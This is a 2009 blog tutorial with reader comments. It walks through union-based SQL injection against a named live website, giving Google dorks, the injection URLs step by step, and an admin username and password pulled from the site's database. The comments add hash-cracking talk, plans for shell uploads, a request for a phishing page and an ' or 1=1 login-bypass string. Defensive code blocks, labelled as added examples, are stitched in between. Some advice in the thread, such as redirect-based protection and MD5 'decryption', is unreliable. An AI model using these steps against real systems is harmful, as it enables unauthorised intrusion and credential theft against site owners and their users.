
by Nishant.Soni on 08/04/09 at 5:31 pm


We just found a good security expert (Nishant Soni) to teach you some real hard core hacking
stuff. He is going to teach you about SQL Injection, Sniffing, Trojans and many more topics.
Hope you enjoy them.
Welcome to my very first tutorial for SQL Injection on Genius hackers. SQL Injection basically
means executing a query in the database connected to a website in order to get personal
information out of it that is not visible to a normal user. A database is most likely to be a part of
a website, and it saves all the information, like user names, passwords, posts and replies. So
there is a possibility that you might put some commands or queries or requests, whatever you
want to call them, into the database to get some hidden information out of it.
It has been noticed that in the past SQL Injection has been used several times to steal credit card
information, e-mail addresses and passwords, because most users have the same e-mail
address and password for all of their accounts. So if you manage to hack one of the
accounts, you may just get access to all of their accounts. SQL Injection is most likely used by
“Penetration Testers” to check whether the websites of their clients are vulnerable to some kind of
attack that steals information. Here, in this article, I will show you how they do it. There are
some simple things expected of you, and one of them is that you have a basic
knowledge of computers. This tutorial will let you know how to start, where to stop and what
to do. If you have any further queries you can post them here and I will help you to work
through them.
PLEASE REMEMBER: Nishant Soni or Genius Hackers take no responsibility whatsoever for any
damage you cause with this knowledge. This is just for educational purposes, so you can
secure your own website.
I will divide this tutorial into some points so it can help you in a better way to understand the
structure of the SQL Database which is working at the backend of the website to store, save and
execute the information.
I will use a LIVE website in this tutorial, so you can try to test it on your own and believe me it
really helps to develop your skills.
The website that I will use today is www[dot]rfidupdate[dot]com.
To understand what an SQL database is, the simplest thing I can explain to you is a
“website where you can register, login or create your own profile”, because it will save the data
you input into your profile and will execute / display it whenever you provide the correct
username or the password. In the same way, the website I mentioned above gives you a
chance to be a part of it; it will update you daily about respective news.
1. How to check if the website is vulnerable to SQL Injection?
A: On most websites I read people saying to add “`” at the end [without quotes],
and that if you get some error, the website is vulnerable to SQL Injection. But being
an experienced guy in penetration, I’d rather tell you that this is a TOTAL MYTH. The best
way to check the site's vulnerability is to add “+order+by+6753” at the end of the URL, because
97% of websites don’t have more than 6753 columns. So by adding the number 6753, you
check whether it has 6753 columns, which it apparently doesn’t have. So it will give you an error, and
if it does, that means that the WEBSITE IS VULNERABLE. It is generally noticed that a
website doesn’t have more than 100 columns at the most in its database. So by entering the
number 6753, you are making sure that the website gives you an error with it. IF it does,
that means you can proceed further. To check for SQL Injection, it's mandatory that the website
points itself to some specific page, i.e. “website.com/index.php?page=11”. In
this case the website is pointing itself to page number 11 to pull up some specific information.
So, to check if the website is vulnerable or not, you can try the following URL, i.e.
“website.com/index.php?page=11+order+by+6753”.
2. How would I find the vulnerable websites?
A: Google is the best friend of hackers. When I say this, don’t assume that I am just writing it
because I am supposed to. I really mean it. There is something called “google dorks”, which
are basically commands that can be put into Google search to find specific groups of
pages.
Here are some Google dorks which you may try to find the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=
This will help you to find the websites which are connected to and working with SQL
databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to
put “order+by+6753” at the end of the URL to check if it's vulnerable.
Step 1 : Finding Vulnerable Page.
Let's start. As you know, the website that I will test today is www.RfidUpdate.com, so let's open
up the website in the browser. Just a little information about the website: RFID means “radio
frequency identification”. On the right hand side you will see that it gives you an opportunity
to subscribe to the website. That should give you an idea: when you subscribe to it, there
has to be a place where your e-mail address is saved, so it has to have a database! So
now we know that the website is supported by an SQL database at the backend, and we are on the
right track.
As I have written earlier, in order to perform an SQL Injection we will have to find a page that
has “something.php?id=2121” at the end of the URL, so we will try to find such a page on
RfidUpdate.com. I have found a page by exploring the website a bit. The URL of the page is,
http://www.rfidupdate.com/articles/index.php?id=1563

Image 1: SQL Injection


So now we know it has an SQL database and we have a page to start with.
So let's check whether the website is vulnerable to SQL attack: we will try to add
“+order+by+6753–” as I have written earlier.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753–
Now, you should have noticed an error, which says :
“Error 1054: Unknown column ‘6753′ in ‘order clause’”
So, it means that the database gave you a message saying “there is no such column”. The error itself
doesn’t really make any difference; the main thing we should notice is that the database
communicated with us directly. So there is a possibility that we can exploit it.
Step 2 : Finding Number of Columns.
Now, the next thing we will try is to find out how many columns this page has. So now,
instead of “6753”, we will start from number 1, then 5, then 15, and we will keep doing this until we
get some error. So, try the following URL.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1–
The webpage opened up fine, which means that the website has more than 1 column. Now try
number 5.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5–
Same thing, now try 10.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10–
Still no error, try 15.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15–
Still no error :(, try 20.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--
WHOA! We got the error, which means that the number of columns in the webpage is between
15 and 20. So let's try with number “16” now.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16–
YAY! You got the error on number “16” as well, which means that the website has 15 columns.
So now let's move further.
Step 3 : Using “Union Select All” Command.
Now we will try to combine all the columns and see what we get. The command goes
as follows:
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–
Image 2: SQL Injection
FYI: please notice that I have added “-” before 1563.
Now you see some broken things in there, and the only independent column number
you see on the website is “7”. So apparently that would be the base of the attack.
Everything we do now will be done with column number “7”.
So we will try to find some more information about the DATABASE this website is using. To
do this we can replace column number 7 with “@@version”, without quotes of course. So
try this now.
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–

Image 3: SQL Injection


This is what you should see now,
“5.0.67-community”
Which means that the website is using SQL Version > 5. Now, try the following URL to move
further.
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%2
0information_schema.tables%20where%20table_Schema=database%20()–

Image 4: SQL Injection


Here, we have replaced column No. 7 with “group_concat(table_name)” and we have added
“from information_schema.tables where table_Schema=database ()” at the end, which are
basically the standard commands for SQL to get further information from the specific
column.
YAY! You should have already noticed that the names of the further columns have appeared in the
list and one of them is “ru_Admin”. That's what we are looking for. Since we have the column for
admin now, we will try to find the username and password out of it. So let's try the following URL
in the address bar.
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from%
20information_schema.columns%20where%20table_Schema=database%20()–
The only thing we’ve changed here is “tables” to “columns”, and you should now see all the
information about the admin’s tables, which should look something like the following.
“ru_Admin_Username,ru_Admin_Password”
So we see, we might be able to crack the username as well as the password. In order to see the
information inside the username and the password columns, let's put in the following URL:
http://www.rfidupdate.com/articles/index.php?id=-
1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_passw
ord),8,9,10,11,12,13,14,15+from%20ru_Admin–
What we did is replace the column names with admin_username & admin_password, and
call it from the ru_Admin column at the end.

Image 5: SQL Injection

VOILA! What you’re looking at right now is the “admin” username and the password in the following
format.
username : password.
admin:admRIvuxHahkQ
FYI: Wherever you see “%20” in the URL, that means a SPACE in the address bar.
So you have the password now, you can use it the way you want!
So this is the way to perform an SQL Injection attack. You may try your own stuff with the Google
dorks I posted in the beginning. Use it the way you want, just keep in mind that if you know
80/100, there are people out there who know 90/100. So better secure yourself first, and try
these attacks with the permission of the site owners.
Thank you all for reading this tutorial, I am sure it helped. If there are any more questions feel
free to revert back to the same post.

Enjoy Ethical hacking
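The requests in Steps 1 to 3 leave a distinctive trail in a web server's access log. The following is an added example, not part of the original tutorial: a Python scan that flags non-integer "id" values and lists the ORDER BY ordinals each client tried. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (common log format, documentation-range IPs),
# shortened from the request shapes shown in Steps 1 to 3.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Apr/2009:17:31:02 +0000] "GET /articles/index.php?id=1563 HTTP/1.1" 200 5120
198.51.100.7 - - [08/Apr/2009:17:31:09 +0000] "GET /articles/index.php?id=1563+order+by+6753-- HTTP/1.1" 200 312
198.51.100.7 - - [08/Apr/2009:17:31:20 +0000] "GET /articles/index.php?id=1563+order+by+1-- HTTP/1.1" 200 5120
198.51.100.7 - - [08/Apr/2009:17:31:26 +0000] "GET /articles/index.php?id=1563+order+by+5-- HTTP/1.1" 200 5120
198.51.100.7 - - [08/Apr/2009:17:31:40 +0000] "GET /articles/index.php?id=1563+order+by+20-- HTTP/1.1" 200 312
198.51.100.7 - - [08/Apr/2009:17:32:05 +0000] "GET /articles/index.php?id=-1563+union+all+select+1,2,3,@@version-- HTTP/1.1" 200 4980
198.51.100.7 - - [08/Apr/2009:17:32:30 +0000] "GET /articles/index.php?id=-1563+union+all+select+1,2,group_concat(table_name)+from%20information_schema.tables-- HTTP/1.1" 200 5033
203.0.113.40 - - [08/Apr/2009:17:33:00 +0000] "GET /articles/index.php?id=1570 HTTP/1.1" 200 4801
203.0.113.40 - - [08/Apr/2009:17:33:12 +0000] "GET /articles/index.php?id=abc HTTP/1.1" 200 312
"""

# client IP, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')

# Patterns matched against the URL-decoded parameter value.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
}
ORDER_BY_NUM = re.compile(r"\border\s+by\s+(\d+)", re.I)


def scan(log_text, param="id"):
    """Return {client_ip: [(decoded_value, [signature names]), ...]}.

    A value is reported whenever the parameter is not a plain integer;
    values that match no signature are labelled "non_integer_id".
    """
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        query = urlsplit(target).query
        # parse_qsl decodes both "+" and "%20" to a space
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name != param or re.fullmatch(r"[0-9]+", value):
                continue
            hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
            findings[ip].append((value, hits or ["non_integer_id"]))
    return dict(findings)


def order_by_sequence(findings):
    """Per client, the ORDER BY ordinals requested, in log order."""
    sequences = {}
    for ip, items in findings.items():
        nums = [int(n) for value, _ in items for n in ORDER_BY_NUM.findall(value)]
        if nums:
            sequences[ip] = nums
    return sequences


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, items in found.items():
        for value, hits in items:
            print(ip, hits, repr(value))
    print("ORDER BY ordinals per client:", order_by_sequence(found))
```

A client that walks through several ORDER BY ordinals in a short time, as the second function reports, is a stronger signal than any single odd request.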


Little About Me:
I am from Mumbai, have been in Australia and U.S. for few years, and my website could be
found at www.TechMafias.com

42 Responses to “SQL Injection : Ultimate method for Website Hacking.”

1.
Ashwin
Apr 8th, 2009
Thank you very much.

2.
rAX
Apr 9th, 2009
Thank you so much for the effort, it’s really educative !
I want to ask you though, what do I need to learn to be a penetration expert? (for good
purpose).

3.
tez2fast
Apr 9th, 2009
Thats Nice 1 Man,… keep On Such Thing,..

4.
irad
Apr 9th, 2009
thank you….thank you very much

5.
Nishant.Soni
Apr 9th, 2009
@ rAX,
Penetration is a field where you need to gain the knowledge first and then the practical
experience, more you explore better you learn. This is the ONLY field which is never
gonna die.
There are different types of ETHICAL HACKERS, some of for APPLICATION BASED
TESTING, some work for WEB TESTING, so it depends where do you want to
expertise.

6.
Tejas Dave
Apr 9th, 2009
lol…..Nishant no offence but im sure u cannot hack sites using sql injection anymore &
the passwords u get in sql are in md5 formats or salted md5 so u cant use dem
directly.plus direct xml parsing is now old & can b used for hacking small sites which r
not even worth a single $.

7.
Tejas Dave
Apr 9th, 2009
& yes new ways of hacking sites are by rooting servers.thats called real hacking & if u
want some examples or tutorials den i can provide u wid dem

8.
Nishant.Soni
Apr 9th, 2009
@Tejas Dave:
We are talking about ETHICAL HACKING In here, and if you are saying that we can not
hack the site with SQL Injections, then I am sorry but you’re completely wrong.
1. MD5: Use Cain & Abel to decrypt the md5 hashes, its decrypted with the help of
bruteforcing attack.
2. I am soon gonna write another article about “uploading shells” with sql injection, so
that will basically grant u access to the entire ftp.
3. You can easily manipulate config.php with the sql injection, and u can make it
vulnerable to RFI or LFI [if u know about them]
4. As far as rooting is concerned, i thought not to post it since I wasn’t sure if the readers
are good enough to understand it in just one go.

9.
Nishant.Soni
Apr 9th, 2009
Yea one more thing, for the MD5 hash cracking, you can have a look at this video.
http://techmafias.com/forum/Thread-decrypting-md5-hashes

10.
john clay
Apr 9th, 2009
well , a nice read material.
will love to have more of this to read…simple and straight to the point.
1love Bro.

11.
tejas dave
Apr 9th, 2009
dude ur telling me that using cain & abel u can crack all md5?r u joking.u can crack
normal md5 but not salted hashes.

12.
Sharad
Apr 9th, 2009
I was just looking for this.
Thanks

13.
Randheer Singh
Apr 10th, 2009
Thanks very much. I was building a website now I can think on these attacks.

14.
Nishant.Soni
Apr 10th, 2009
@tejas_dave:
Most of the hashes are normal MD5s and if the website is using some specific software
like some forum through SMF, phpBB,myBb or a blog like wordpress then the hashes are
converted into respective flavors. As far as decrypting the SALTED and the SHVA hashes
are concerned, i will write an article soon about that.
Please ask your questions out of curiosity, your question are more about aggression and
offense rather than confusion, objection or doubt. We are here to share the knowledge, if
you think you something on top of this, then try to write an article, don’t try to create a
chaos.
P.S.: Please remember, i try to teach ETHICAL, i wudn’t suggest any one to misuse it.

15.
Nishant.Soni
Apr 10th, 2009
Here is a list of SQL Injection commands / queries which you may try to understand it
better.
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user
identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database

16.
XERO
Apr 11th, 2009
HI
Excellent tutorial and it cleared my doubts. However I would like to ask if there are ways
to hack PHP pages with similar encoding like SQL injections ? I would like to ask if there
are similar techniques involved in hacking PHP based username pass forms or websites ?
Thanks
-XERO

17.
prashanth
Apr 11th, 2009
i need to make a fake login page for hotmail…
Can you help me with it??
if you can then mail me to “prashanth_s@live.com”

18.
Nishant.Soni
Apr 12th, 2009
@XERO.
It really depends if there are some vulnerabilities in that php page. If you can give an
example of the page you’re talking about, it would be easier for me to help you.

19.
Syed.atif
Apr 13th, 2009
Hello
Nishant.Soni
i am just a network guy, this article came across me so Just want to request that as an
expert of Penetration can u also provide tips and suggestion to secure the sites for this
sort of attacks.
regards

20.
Ajaykumar
Apr 14th, 2009
hiiiiiii i’m new to SQL but i understood the concept of ur injection.but i dont know what to
do that ADMIN username and password.
where shal i use them???

21.
Ajaykumar
Apr 14th, 2009
at the last of the ur injection we get only admin username only but not the password but u
r showing it

22.
Nishant.Soni
Apr 14th, 2009
@ Syed.atif :- To secure the website from this kind of attack, you have to make sure that
your website doesnt follow every path. I mean it should be redirected to the index page if
some unknown page is attempted to access.
@Ajay kumar: With the admin username and password, you can login to “admin control
panel”. Thats ur job to find it. Because i wudn’t prefer to show the admin control panel
on that site in here.
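Added example, not written by any commenter in this thread: the usual fix for the "index.php?id=" pattern from the article is to accept only a plain integer, pass it to the database as a bound parameter, and keep database error text out of the response. The sketch uses Python with an in-memory SQLite database; the table names, data and function names are constructed.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for a site database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE site_admin (username TEXT, password_hash TEXT);
        INSERT INTO articles VALUES (1563, 'RFID news', 'Article text');
        INSERT INTO site_admin VALUES ('admin', 'constructed-hash-value');
    """)
    return conn


def fetch_article_unsafe(conn, raw_id):
    # Vulnerable pattern: the request text is pasted into the statement,
    # so the database parses everything after the number as SQL.
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn, raw_id):
    # 1. Allow-list validation: the parameter must be 1 to 10 ASCII digits.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None
    # 2. Bound parameter: the value is sent as data, never parsed as SQL.
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id = ?", (int(raw_id),)
    ).fetchone()


def handle_request(conn, raw_id):
    """Return (status, body); database error text never reaches the client."""
    try:
        row = fetch_article_safe(conn, raw_id)
    except sqlite3.Error:
        # Log the detail on the server, answer with a generic message.
        return 500, "Internal error"
    if row is None:
        return 404, "Not found"
    return 200, row[1]


if __name__ == "__main__":
    conn = make_db()
    # Constructed inputs modelled on the request shapes in the article.
    for raw in ("1563", "1563 order by 6753",
                "-1563 union all select 1, username, password_hash from site_admin"):
        try:
            unsafe = fetch_article_unsafe(conn, raw)
        except sqlite3.Error as exc:
            unsafe = "database error: %s" % exc
        print(repr(raw))
        print("  unsafe:", unsafe)
        print("  safe:  ", handle_request(conn, raw))
```

Running the web application under a database account that cannot read other tables or information_schema limits what a missed injection point can expose.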

23.
Drexler
Apr 17th, 2009
Thanks for this lesson hummm so interesting,…am new here dough but while going
through the process, most of the link displayed error. from the step 2 down. Anyway keep
it up…you good…cheer

24.
Ajaykumar
Apr 17th, 2009
But how can i know the admin page who is providing data base to the site.I’m in initial
stages plss help me

25.
Ajaykumar
Apr 17th, 2009
@Drexler:: hey they are working links from step 2 u have to remove “-” at the end of the
links .
ru getting me

26.
Vinayak
Apr 18th, 2009

Thanks Nishant A Very Useful Tutorial I Have Found The Admin Login Page But To
Login Do I Need To Use Any Proxy ???

27.
Nishant.Soni
Apr 19th, 2009
@Vinayak:
1. I don’t support un-ethical stuffs
2. Everyone can track the login logs in admin control panel
3. Rather then trying to mess with the site, i will suggest you to contact the website owner
and let them know about the vulnerability.

28.
Parag
Apr 19th, 2009
Dude the link at the end which leads to username and password
does not work.

29.
Nishant.Soni
Apr 19th, 2009
@Parag:
Since i’ve copy pasted the links, the format has been disordered. So, you will have to
manually type it into your address bar. It will work

30.
askoppal
Apr 19th, 2009
@Nishant.Soni
MD5(Message-Digest algorithm 5) is an irreversible hash which cannot be ‘decrypted’.If
anybody said it can be decrypted its just NONSENSE.
Now you may be thinking how Cain & Abel and other sites decrypt those MD5 hashes,its
done by a simple technique.
Just type in text and produce a MD5 encryption of that text. The text and the MD5 hash is
then inserted into a table. To ‘decrypt’, Cain and Abel just search in that table for similar
hashes, known as an MD5 rainbow table.
If I have a password “genius” or “hacker”.You can find it easily on that table because its
common words.That’s the reason you shouldn’t use common words as passwords.
But if I have a password like “278askoppal345″ chance of being in the database, and is
unlikely anyone in the world has the same password. Therefore, it has very “little chance”
of ending up in a database.
If you want to make it even more secured against decryption (for covering those “little
chances”)we use a common technique called salt the password thats what Tejas Dave
have mentioned.I will just explain one method of it i.e. adding characters along with
password before its being hashed.Even if my password is in the rainbow table the hacker
cannot decrypt my password because he doesn’t know my salting technique.
Secondly,
You cannot have an article on “decrypting salted md5 and SHA” . Because its pointless
like making coffee and asking to “decrypt” the milk from it.
-askoppal.com
“My ignorance always amuses me”
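Added example, not part of askoppal's comment: the lookup-table idea described above, next to per-user salted PBKDF2 storage, using only Python's standard library. The word list, iteration count and storage format are assumptions chosen for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed list standing in for a precomputed table of common passwords.
COMMON_WORDS = ["genius", "hacker", "password", "letmein"]


def build_lookup(words):
    """Precompute unsalted MD5 digests: {hex digest: plaintext}."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def lookup(table, digest_hex):
    """Return the plaintext if the digest was precomputed, else None."""
    return table.get(digest_hex)


def hash_password(password, iterations=200_000):
    """Store format (assumed here): scheme$iterations$salt_hex$hash_hex.

    The salt is random per user and is stored next to the hash. It does not
    need to be secret; its job is to make every stored hash unique so one
    precomputed table cannot cover many accounts.
    """
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, dk_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), salt, int(iterations)
        )
    except ValueError:
        return False  # malformed record
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    table = build_lookup(COMMON_WORDS)
    unsalted = hashlib.md5(b"genius").hexdigest()
    print("unsalted MD5 found in table:", lookup(table, unsalted))

    first = hash_password("genius")
    second = hash_password("genius")
    print("same password, two users, same record?", first == second)
    print("salted hash found in table:", lookup(table, first.split("$")[3]))
    print("login with correct password:", verify_password("genius", first))
```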

31.
Nishant.Soni
Apr 20th, 2009
@ askoppal.
1. I like you, because ur the best person who knows how to divert minds from actual
topic.
2. What you’re talking about is just CRACKING, what i referred to was “Brute forcing”
MD5s.
3. Nice example of coffee and milk, i know u cant decrypt milk out of coffee, but yes you
can understand that coffee has, milk, sugar etc..
4. Y i don’t see any of your articles “mate”!?

32.
Nishant.Soni
Apr 20th, 2009
@ Askoppal:
Sorry i forgot to add.
1. When we talk about MD5, we dont say “hack”, we say “crack”. So it should come to
your mind that, the word “crack” means a possibility not certainty.
2. Thats why people release their “dictionaries” so they can be used for “dictionaries
cracking attempts”
3. and atlast i ‘ve already wrote about brute forcing above.

33.
askoppal
Apr 20th, 2009
@Nishant.Soni
NISHANT: I like you, because ur the best person who knows how to divert minds from
actual topic.
ASKOPPAL:I am just questioning the statements you made.
NISHANT: What you’re talking about is just CRACKING, what i referred to was “Brute
forcing” MD5s.

ASKOPPAL:You make me laugh…. Bruteforcing is a way of cracking.I was talking
about PRECOMPUTATION in my comments.
Dude its impossible to decrypt MD5 using the method “Brute forcing”
You may find internet articles or post where people relate brute forcing and MD5 but its a
common mistake,The method they actually mean is “precomputation” (Using rainbow
tables).
If you are so particular that you can do it please decrypt this normal MD5 hash (It is not
salted) which is an easy guess for a security expert like you -
fedd0876f12728f8ef6890fbfed25edd
GH audience will be eager to see you decrypting those, don’t disappoint them Nishant.
NISHANT: Nice example of coffee and milk, i know u cant decrypt milk out of coffee,
but yes you can understand that coffee has, milk, sugar etc..
ASKOPPAL:You wont know coffee has adequate amount of milk and sugar unless you
taste it
NISHANT: Y i don’t see any of your articles “mate”!?
ASKOPPAL: I blog at http://45k.me sponsored by Sathish
NISHANT:When we talk about MD5, we dont say “hack”, we say “crack”. So it should
come to your mind that, the word “crack” means a possibility not certainty.Thats why
people release their “dictionaries” so they can be used for “dictionaries cracking
attempts” and atlast i ‘ve already wrote about brute forcing above.
ASKOPPAL: You are proving yourself to be a jackass or an english mentor or something
else.The above statement is just nonsense.
-askoppal.com
“My ignorance always amuses me”

34.
askoppal
Apr 22nd, 2009
The hash value fedd0876f12728f8ef6890fbfed25edd which I gave to Nishant is decrypted
to N.i.s.h.a.n.t S.o.n.i
You can confirm the accuracy of the hash using an on-line hash generator created by me
http://45k.me/blog/2009/04/md5-sha1-sha256-hashing/
If we use a Bruteforce method it would took around 262800 hrs. i.e. 30 years in a 3 Ghz ,
2Gb RAM equipped system to decrypt the above hash even if i know the keyspace of the
password.So Brute force ain’t a good technique to crack admin’s password.
-askoppal

35.
Nishant.Soni
Apr 23rd, 2009
@askoppal:
That is the only reason i said it isnt 100%. MD5 is a nice algorithm. It may work it may
not. OR u may have to wait for a long time.

36.
raaghav
Apr 23rd, 2009
nice tutorial , i ll try it on other sites too

37.
Panwar
Apr 27th, 2009
Thanks for nice article everything is clear but i am stuck at two points.
1-How to find sites where we can put sql injections as you described it well but if you plz
put some more light on it then it will be very usefull.
2-Last url is not working to get username and password as i have also added code
manually in second last url, i mean i add admin_username & admin_password and put
ru_Admin but no work.
Also from where we have to start learning from newbie to expert, so we can safe our sites
?

38.
junaid
Apr 28th, 2009
thanks, it really helping

39.
xXXh4Ck3rXXx
Apr 28th, 2009
hey dude the tuts if u make a video becomes more user friendly
and try and teach others advanced thing this is t00 n00bish
and too basic

40.
Neo_Warez
May 1st, 2009
Dude!
I love this post, i think this is the first time i’m posting here on Genius Hackers…..I love
ur post!!

41.
des
May 5th, 2009
Hello Nishant,
I wonder what is your nick name on techm forum, I would like to have your opinion on
the topic, which I recently open there.
thx.

42.
Kalpana
Jun 2nd, 2009
hi Nishant
Thanks its a good article. My question is can we login in to a web page without userid
and pwd???
i read an article by viewing web page source we can login
ex: ‘ or 1=1– using these types
